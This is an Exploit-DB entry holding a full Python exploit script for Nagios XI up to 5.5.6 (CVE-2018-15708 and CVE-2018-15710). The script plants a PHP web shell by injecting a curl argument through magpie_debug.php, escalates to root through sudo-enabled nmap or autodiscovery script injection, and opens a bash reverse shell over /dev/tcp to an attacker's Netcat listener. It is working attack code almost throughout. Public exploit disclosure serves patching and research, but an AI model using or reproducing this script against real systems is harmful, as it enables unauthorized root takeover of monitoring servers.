Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation

EDB-ID:

46221




Platform:

Linux

Date:

2019-01-23


# Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation
# Date: 2019-01-22
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.nagios.com/
# Product: Nagios XI
# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.6.tar.gz
# Version: From 2012r1.0 to 5.5.6
# Tested on: 
#	- CentOS Linux 7.5.1804 (Core) / Kernel 3.10.0 / This was a vendor-provided .OVA file
#	- Nagios XI 2012r1.0, 5r1.0, and 5.5.6
# CVE: CVE-2018-15708, CVE-2018-15710
#
# See Also:
# https://www.tenable.com/security/research/tra-2018-37
# https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172
#
# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop a root reverse shell.
# You'll need your own Netcat listener

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer, threading, ssl
import requests, urllib
import sys, os, argparse
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

TIMEOUT = 5 # sec

def err_and_exit(msg):
    print '\n\nERROR: ' + msg + '\n\n'
    sys.exit(1)

# handle sending a get request
def http_get_quiet(url):
    try:
        r = requests.get(url, timeout=TIMEOUT, verify=False)
    except requests.exceptions.ReadTimeout:
        err_and_exit("Request to '" + url + "' timed out.")
    else:
        return r

# 200?
def url_ok(url):
    r = http_get_quiet(url)
    return (r.status_code == 200)

# run a shell command using the PHP file we uploaded
def send_shell_cmd(path, cmd):
    querystr = { 'cmd' : cmd }
    # e.g. http://blah/exec.php?cmd=whoami
    url = path + '?' + urllib.urlencode(querystr)
    return http_get_quiet(url)

# delete some files locally and on the Nagios XI instance
def clean_up(remote, paths, exec_path=None):
    if remote:
        for path in paths:
            send_shell_cmd(exec_path, 'rm ' + path)
            print 'Removing remote file ' + path
    else:
        for path in paths:
            os.remove(path)
            print 'Removing local file ' + path

# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
def generate_self_signed_cert(cert_dir, cert_file, key_file):
    """Generate a SSL certificate.
 
    If the cert_path and the key_path are present they will be overwritten.
    """
    if not os.path.exists(cert_dir):
        os.makedirs(cert_dir)
    cert_path = os.path.join(cert_dir, cert_file)
    key_path = os.path.join(cert_dir, key_file)
 
    if os.path.exists(cert_path):
        os.unlink(cert_path)
    if os.path.exists(key_path):
        os.unlink(key_path)
 
    # create a key pair
    key = crypto.PKey()
    key.generate_key(crypto.TYPE_RSA, 1024)
 
    # create a self-signed cert
    cert = crypto.X509()
    cert.get_subject().C = 'US'
    cert.get_subject().ST = 'Lorem'
    cert.get_subject().L = 'Ipsum'
    cert.get_subject().O = 'Lorem'
    cert.get_subject().OU = 'Ipsum'
    cert.get_subject().CN = 'Unknown'
    cert.set_serial_number(1000)
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60) 
    cert.set_issuer(cert.get_subject())
    cert.set_pubkey(key)
    cert.sign(key, 'sha1')
 
    with open(cert_path, 'wt') as fd: 
        fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
 
    with open(key_path, 'wt') as fd: 
        fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
 
    return cert_path, key_path

# HTTP request handler
class MyHTTPD(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
        self.end_headers()
        self.wfile.write(str.encode(msg))

# Make the http listener operate on its own thread
class ThreadedWebHandler(object):
    def __init__(self, host, port, keyfile, certfile):
        self.server = SocketServer.TCPServer((host, port), MyHTTPD)
	self.server.socket = ssl.wrap_socket(
	    self.server.socket,
	    keyfile=keyfile,
	    certfile=certfile,
	    server_side=True
	)
        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True

    def start(self):
        self.server_thread.start()

    def stop(self):
        self.server.shutdown()
        self.server.server_close()

##### MAIN #####

desc = 'Nagios XI 2012r1.0 < 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')

args = arg_parser.parse_args()

# Nagios XI target settings
target = { 'ip' : args.t }

# listener settings
listener = {
    'ip'    : args.ip,
    'port'  : args.port,
    'ncip'  : args.ncip,
    'ncport': args.ncport
}

# generate self-signed cert
cert_file = 'cert.crt'
key_file = 'key.key'
generate_self_signed_cert('./', cert_file, key_file)

# start threaded listener
# thanks http://brahmlower.io/threaded-http-server.html
server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
server.start()

print "\nListening on " + listener['ip'] + ":" + str(listener['port'])

# path to Nagios XI app
base_url = 'https://' + target['ip']

# ensure magpie_debug.php exists
magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
if not url_ok(magpie_url):
    err_and_exit('magpie_debug.php not found.')

print '\nFound magpie_debug.php.\n'

exec_path = None        # path to exec.php in URL
cleanup_paths = []     # local path on Nagios XI filesystem to clean up
# ( local fs path : url path )
paths = [
    ( '/usr/local/nagvis/share/', '/nagvis' ),
    ( '/var/www/html/nagiosql/', '/nagiosql' )
]

# inject argument to create exec.php
# try multiple directories if necessary. dir will be different based on nagios xi version
filename = 'exec.php'
for path in paths:
    local_path = path[0] + filename # on fs
    url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path  # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php
    url = magpie_url + '?url=' + url
    print 'magpie url = ' + url
    r = http_get_quiet(url)

    # ensure php file was created
    exec_url = base_url + path[1] + '/' + filename  # e.g. https://192.168.1.192/nagiosql/exec.php
    if url_ok(exec_url):
        exec_path = exec_url
        cleanup_paths.append(local_path)
        break
    # otherwise, try the next path

if exec_path is None:
    err_and_exit('Couldn\'t create PHP file.')

print '\n' + filename + ' written. Visit ' + exec_url + '\n'

# run a few commands to display status to user
print 'Gathering some basic info...'
cmds = [
    ('whoami', 'Current User'),
    ("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
]

for cmd in cmds:
    r = send_shell_cmd(exec_url, cmd[0])
    sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)

# candidates for privilege escalation
# depends on Nagios XI version
rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'
# tuple contains (shell command, cleanup path)
priv_esc_list = [
    ("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
    ("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
]

# escalate privileges and launch the connect-back shell
timed_out = False
for priv_esc in priv_esc_list:
    try:
        querystr = { 'cmd' : priv_esc[0] }
        url = exec_path + '?' + urllib.urlencode(querystr)
        r = requests.get(url, timeout=TIMEOUT, verify=False)
        print '\nTrying to escalate privs with url: ' + url
    except requests.exceptions.ReadTimeout:
        timed_out = True
        if priv_esc[1] is not None:
            cleanup_paths.append(priv_esc[1])
        break

if timed_out:
    print 'Check for a shell!!\n'
else:
    print 'Not so sure it worked...\n'

server.stop()

# clean up files we created
clean_up(True, cleanup_paths, exec_path) # remote files
clean_up(False, [cert_file, key_file])